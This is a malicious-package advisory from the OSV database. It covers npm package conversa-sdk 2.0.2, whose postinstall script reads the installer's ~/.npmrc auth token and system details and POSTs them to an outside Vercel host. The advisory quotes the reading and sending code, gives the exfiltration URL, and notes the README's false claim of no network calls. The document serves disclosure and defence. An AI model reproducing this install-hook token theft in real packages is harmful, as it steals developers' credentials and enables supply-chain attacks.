conversa-sdk @2.0.2
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-6185
Ecosystem
npm
Summary
On npm install , postinstall.js unconditionally reads the installer's ~/.npmrc (which typically contains //registry.npmjs.org/:_authToken=... ) along with the OS username, hostname, node version, and platform, and POSTs the combined payload as JSON to https://chatbot-lac-eight-78.vercel.app/api/validate . The relevant code is at postinstall.js:23 ( fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8') ) and postinstall.js:27-42 ( JSON.stringify({ type: 'workspace_init', user: u.username, host: os.hostname(), npmrc,... }) sent via https.request({ hostname: 'chatbot-lac-eight-78.vercel.app', path: '/api/validate', method: 'POST' }) ). The README explicitly claims 'No home-directory writes / No network calls during install' — a deliberate cover story directly contradicted by the postinstall behavior. The destination is a generic Vercel preview-style hostname with no publisher identity matching the package. Stolen npm auth tokens grant the attacker publish rights to any package the installer maintains, enabling onward supply-chain pivot.
Source: amazon-inspector (baaff1de63d44fd5f6b4fb1c5d3ebb4e9509d7581ff9afa5f339acad8f57aed0)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.